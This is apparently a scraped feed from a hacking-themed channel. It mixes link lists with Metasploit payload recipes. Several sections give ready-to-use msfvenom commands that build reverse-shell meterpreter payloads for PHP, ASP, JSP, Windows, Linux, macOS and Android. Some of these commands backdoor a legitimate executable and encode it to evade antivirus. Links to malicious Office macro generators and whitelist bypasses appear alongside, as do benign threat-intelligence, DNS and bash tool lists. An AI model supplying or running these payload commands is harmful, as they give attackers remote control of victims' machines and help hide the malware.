UNDERCODE
#Exploits & #Bugs New:
- [Exploiting CVE-2017-0199: HTA Handler Vulnerability](https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/)
- CVE-2017-0199 Toolkit
- [Windows Signed Binary](https://github.com/vysec/Windows-SignedBinary)
- Wepwnise
- [Bash Bunny](https://hakshop.com/products/bash-bunny)
- Generate Macro - Tool
- [How To: Empire's Cross Platform Office Macro](https://www.blackhillsinfosec.com/empires-cross-platform-office-macro/)
- Excel macros with PowerShell
- [PowerPoint and Custom Actions](https://phishme.com/powerpoint-and-custom-actions/)
- MS Signed mimikatz in just 3 steps
- [Hiding your process from sysinternals](https://riscybusiness.wordpress.com/2017/10/07/hiding-your-process-from-sysinternals/)
- Luckystrike: An Evil Office Document Generator
- [The Absurdly Underestimated Dangers of CSV Injection](http://georgemauer.net/2017/10/07/csv-injection.html)
- Macro-less Code Exec in MSWord
- [Multi-Platform Macro Phishing Payloads](https://medium.com/@malcomvetter/multi-platform-macro-phishing-payloads-3b688e8eff68)
- Macroless DOC malware that avoids detection with Yara rule
- [Empire without powershell](https://bneg.io/2017/07/26/empire-without-powershell-exe/)
- Powershell without Powershell to bypass app whitelist
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
MDSec
Exploiting CVE-2017-0199: HTA Handler Vulnerability - MDSec
FireEye recently documented attacks of a 0-day vulnerability in the Windows HTA handler being exploited in the wild using Office RTF documents. The vulnerability later became referenced as CVE-2017-0199 and addressed...
Web #Payloads Commands Metasploit
1) msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php
   - Creates a Simple TCP Shell for PHP
2) msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp
   - Creates a Simple TCP Shell for ASP
3) msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp
   - Creates a Simple TCP Shell for Javascript
4) msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war
   - Creates a Simple TCP Shell for WAR
> git sources
Open Source #Threat Intelligence
- GOSINT - a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). GOSINT allows a security analyst to collect and standardize structured and unstructured threat intelligence.
- Awesome Threat Intelligence - A curated list of awesome Threat Intelligence resources. This is a great resource and I try to contribute to it.
GitHub - ciscocsirt/GOSINT: The GOSINT framework is a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs).
IP address and DNS #Lookup Tools 2020:
- bgp
- Bgpview
- DataSploit (IP Address Modules)
- Domain Dossier
- Domaintoipconverter
- Googleapps Dig
- Hurricane Electric BGP Toolkit
- ICANN Whois
- Massdns
- Mxtoolbox
- Ultratools ipv6Info
- Viewdns
- Umbrella (OpenDNS) Popularity List
> git sources
bgpview.io
BGPView - BGP Toolkit and BGP ASN Routing Lookup Tool
BGPView allows you to debug and investigate information about IP addresses, ASN, IXs, BGP, ISPs, Prefixes and Domain names.
Public Pen Testing Reports recommended:
> The following are several resources that are useful when writing penetration testing reports, including many different examples:
1) Curated List of penetration testing reports | https://github.com/santosomar/public-pentesting-reports (forked from https://github.com/juliocesarfort/public-pentesting-reports) |
2) SANS guidance on writing penetration testing reports | https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343 |
3) Offensive Security example | https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf |
4) PCI Security report guidance | https://www.pcisecuritystandards.org/documents/Penetration_Testing_Guidance_March_2015.pdf |
5) Dradis Framework | https://dradisframework.com/ce/ |
> git sources
GitHub - santosomar/public-pentesting-reports: Curated list of public penetration test reports released by several consulting firms and academic security groups
Creating Binaries with metasploit:
1) msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
   - Creates a simple TCP Payload for Windows
2) msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
   - Creates a simple HTTP Payload for Windows
3) msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf
   - Creates a simple TCP Shell for Linux
4) msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho
   - Creates a simple TCP Shell for Mac
5) msfvenom -p android/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk
   - Creates a simple TCP Payload for Android
#Shell Script Development:
- ansi - ANSI escape codes in pure bash - change text color, position the cursor, much more
- argbash - Bash argument parsing code generator
- assert.sh - Bash unit testing framework
- BashScriptTestingLibrary - A unit testing framework for Bash scripts
- bash3boilerplate - Templates to write better Bash scripts
- bashful - A collection of libraries to simplify writing Bash scripts
- bashmanager - mini bash framework for creating command line tools
- bats - Bash Automated Testing System
- bash_unit - bash unit testing enterprise edition framework for professionals
- mo - Mustache templates in pure bash
- semver_bash - Semantic Versioning in Bash
- shfmt - Format bash programs
- shunit2 - A unit test framework for Bash scripts with a flavour of JUnit/PyUnit
- bashing - Smashing Bash into Pieces - Bash framework for creating command line tools
- shellcheck - ShellCheck, a static analysis tool for shell scripts
>git sources
GitHub - fidian/ansi: ANSI escape codes in pure bash - change text color, position the cursor, much more
SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC).py
942 B
2020 Verified Cve SpotOutlook Crash 100/100
#Android Security Editing 2020 resources:
- Android Developer Studio
- APKtool
- dex2jar
- Bytecode Viewer
- IDA Pro
- Android Reverse Engineering Arsenals
Android Developers
Download Android Studio & App Tools - Android Developers
Android Studio provides app builders with an integrated development environment (IDE) optimized for Android apps. Download Android Studio today.
> HACK GMAIL
> JAVASCRIPT TUT
> IMAGES
>ICMP
>AND KERNEL TUTORIALS PDFS
Forwarded from UNDERCODE SECURITY
How to Create Windows Payload:
> Windows #Payloads
1) msfvenom -l encoders
   - Lists all available encoders
2) msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
   - Binds an exe with a Payload (Backdoors an exe)
3) msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > example.exe
   - Creates a simple TCP payload with shikata_ga_nai encoder
4) msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe > example.exe
   - Binds an exe with a Payload and encodes it